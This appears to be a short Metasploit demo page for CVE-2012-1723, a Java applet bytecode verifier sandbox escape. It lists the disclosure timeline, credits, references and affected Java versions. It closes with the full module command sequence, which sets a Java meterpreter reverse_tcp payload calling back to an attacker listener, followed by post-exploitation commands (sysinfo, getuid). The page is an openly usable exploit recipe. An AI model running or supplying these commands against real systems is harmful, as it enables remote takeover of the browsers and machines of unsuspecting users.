CVE-2012-1723 Oracle Java Applet Field Bytecode Verifier Cache RCE Metasploit Demo

Timeline :

Public release of the vulnerability the 2012-06-12
First PoC provided by Michael Schierl the 2012-06-13
Metasploit PoC provided the 2012-07-09

PoC provided by :

Stefan Cornellius
mihi
littlelightlittlefire
juan vazquez
sinn3r

Reference(s) :

CVE-2012-1723
OSVDB-82877
BID-52161
Oracle Java SE Critical Patch Update Advisory – June 2012

Affected version(s) :

Oracle Java JSE 7 Update 4 and before
Oracle Java JSE 6 Update 32 and before
Oracle Java JSE 5 Update 35 and before
Oracle Java JSE 1.4.2_37 and before

Tested on Windows XP Pro SP3 with :

Oracle JSE 1.6.0_32-b05

Description :

This module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimisation of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficent type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.

Commands :

use exploit/multi/browser/java_verifier_field_access
set SRVHOST 192.168.178.100
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid